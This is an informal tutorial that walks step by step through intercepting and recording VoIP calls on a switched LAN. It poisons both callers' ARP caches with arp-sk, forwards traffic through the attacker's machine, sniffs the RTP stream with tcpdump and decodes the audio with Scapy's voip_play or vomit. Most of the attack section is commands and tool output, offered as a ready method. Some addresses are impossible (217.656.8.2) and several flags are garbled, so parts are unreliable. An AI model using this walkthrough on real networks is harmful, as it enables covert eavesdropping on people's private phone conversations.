Intercepting VoIP Calls A Demonstration
Hello, this tutorial or demonstration is all about Intercepting VoIP calls, but what is VoIP actually? VoIP (aka. Voice over Internet Protocol, IP Telephony, Internet telephony or Boadband Phone). Is routing voice communication over the internet or private networks instead of traditional POTS lines. VoIP is getting more popular by busnisses and home users around the world. VoIP can be pretty secure, but as usual most people don-t implement it good. System are left in it default configuration, because it works,this can bring up some insecurities. This tutorial or demonstration will explain how to intercept VoIP calls on a network in a switch enviroment between 2 known users. We will use different kind of software to spoof ARP, Sniff the network, and -recording- the actual conversation. And I assume you-re on *Nix based machine, no worries if you-re on a NT machine you will still learn a lot or use one of many Live Cds out there.. .
You can get more general information about VoIP at
http://en.wikipedia.org/wiki/VoIP
Our Scenario:
To intercept the VoIP call we will need first to intercept the RTP stream, because this is on a network you may sit between the caller and the called person, but that is not often the case so we will need to employ ARP spoofing. Many networks don-t have the security Features enabled to disable ARP Spoofing and the system will happily accept the changes. A lot of companies have their VoIP traffic on a dedicated VLAN on the network. An attacker can easily access the VoIP VLAN, because the phone it generally provides connection to the PC.
Tools I used are dsniff-s arpspoof (http://www.monkey.org/~dugsong/dsniff) or arp-sk (http://www.arp-sk.org) to corrupt the ARP cache. After that you will be able to acces the VoIP dataStream with a sniffer. I used tcpdump as my sniffer, but you could use ethereal if you wish.
This is my configuration:
Caller 00:78:64:01:13:01 217.170.8.1 Caller_A 00:78:64:01:13:02 217.656.8.2 Attacker 00:99:60:01:01:66 217.656.8.9
Lets Start:
On our Attacker server we need to turn on routing, turn off ICMP redirects and then reincrement the TTL sing IP tables. Check your Manual for more information on how to enable this. Some system will be able to accept the following, but this varies from you platform.
#echo 1 > /proc/sys/net/ipv4/ip_forward #iptables -I FORWARD -I eth0 -o eth0 -j ACCEPT #echo 0 > /proc/sys/net/ipv4/conf/eth0/send_redirects #iptables -t mangle -A FORWARD -j TTL -ttl-inc 1
The attacker, has a MAC/IP address of 00:99:60:01:01:66 and an IP address of 217.656.8.9 and uses eth0.
# arp-sk -w -d Caller -S Caller_A -D Caller + Intitialization of the packet structure + Running mode -who-has- + Ifname: eth0 + Source MAC: 00:99:60:01:01:66 + Source ARP MAC: 00:99:60:01:01:66 + Source ARP IP : 217.656.8.2 +Target MAC: 00:78:64:01:13:01 +Target ARP MAC: 00:00:00:00:00 +Target ARP IP : 217.170.8.1 --- Start classical sending --- TS: 20:42:48:782795 To: 00:78:64:01:13:01 From: 00:99:60:01:01:66 0x0806 ARP Who has 217.170.8.1 (00:00:00:00:00) ? Tell 217.656.8.2 (00:99:60:01:01:66) TS: 20:42:48.803565 To: 00:78:64:01:13:01 From: 00:99:60:01:01:66 0x0806 ARP Who has 217.170.8.1 (00:00:00:00:00) ? Tell 217.656.8.2 (00:99:60:01:01:66)
Now, Caller thinks that Caller_A is at 00:99:60:01:01:66 (Attacker). A tcpdump shows use that we succeeded in corrupting his ARP cache.
Sniffing with network device eth0:
# tcpdump -I eth0 -ne arp -Output trimmed- Now we need to do the same attack against Caller_A in order to sniff the return traffic. # arp-sk -w -d Caller_A -S Caller -D Caller_A + Intitialization of the packet structure + Running mode -who-has- + Ifname: eth0 + Source MAC: 00:99:60:01:01:66 + Source ARP MAC: 00:99:60:01:01:66 + Source ARP IP: 217.170.8.1 +Target MAC: 00:78:64:01:13:02 +Target ARP MAC: 00:00:00:00:00 +Target ARP IP: 217.656.8.2 --- Start classical sending --- TS: 20:42:48:782795 To: 00:78:64:01:13:02 From: 00:99:60:01:01:66 0x0806 ARP Who has 217.170.8.1 (00:00:00:00:00) ? Tell 217.170.8.1 (00:99:60:01:01:66) TS: 20:42:48.803565 To: 00:78:64:01:13:02 From: 00:99:60:01:01:66 0x0806 ARP Who has 217.170.8.1 (00:00:00:00:00) ? Tell 217.170.8.1 (00:99:60:01:01:66)
Now, Caller_A thinks that Caller is at 00:99:60:01:01:66 (Attacker). A tcpdump shows use that we succeeded in corrupting his ARP cache
Sniffing with network device eth0:
# tcpdump -I eth0 -ne arp -Output trimmed- Sniffing: We-re now set to start sniffing UDP traffic between the 2 phones. #tcpdump -I eth0 -n host 217.170.8.1 21:53:28.838301 217.170.8.1.27182 > 217.656.8.2.19560 udp 172 [tos 0xb8] 21:53:28.838301 217.656.8.2.19560 > 217.170.8.1.27182 udp 172 21:53:28.838301 217.170.8.1.27182 > 217.656.8.2.19560 udp 172 [tos 0xb8] 21:53:28.838301 217.656.8.2.19560 > 217.170.8.1.27182 udp 172
Most of the case phones only send UDP traffic in the RTP stream, Local ports (27182 and 19560) in our example.
Decoding:
After you identified the RTP stream, you will need to find the codec used (to encode the voice). You can find this information in the (PT) field in the UDP stream on in the Media Format field in the SIPchange to find the format.
Most cheap phone don-t use band-with friendly codec use G.7.11, also known as PCM or G.729 for the one that optimize bandwidth usage. The tools I am going to use to decode the RTP stream (G.711) arevomit (http://vomit.xtdnet.nl ) and scapy (http://www.secdev.org/projects/scapy)
I prefer Scapy over Vomit so lets start wit Scapy. With Scapy you can sniff live traffic and it will be automatically decode the RTP stream. It can feed the conversation directly to the speakers. Lets start with running Scapy.
# ./scapy Welcome to Scapy (1.0.17.20beta) >\>> voip_play (-217.170.8.1-, iface=-eth0-)
It is also possible to run Scapy on a WLAN with or without WEP Encryption. To run Scapy on a WLAN is actually the same as running it on eth0, check the documentation for more information on this. Another tool to convert the conversation from a G.711 to WAV is Vomit. We can use Vomit on a tcpdump output file. You can do this as followed.
# vomit -r Conversation.tcpdump | waveplay -S8000 -B16 -C1
Now you have successful intercept and recorded VoIP calls.
Links:
VoIP security issues:
http://pcworld.about.com/news/May052005id120668.htm
ARP Spoofing:
http://en.wikipedia.org/wiki/ARP_spoofing
Sniffing:
http://www.irongeek.com/i.php?page=security/AQuickIntrotoSniffers
Dsniff Package:
http://www.monkey.org/~dugsong/dsniff
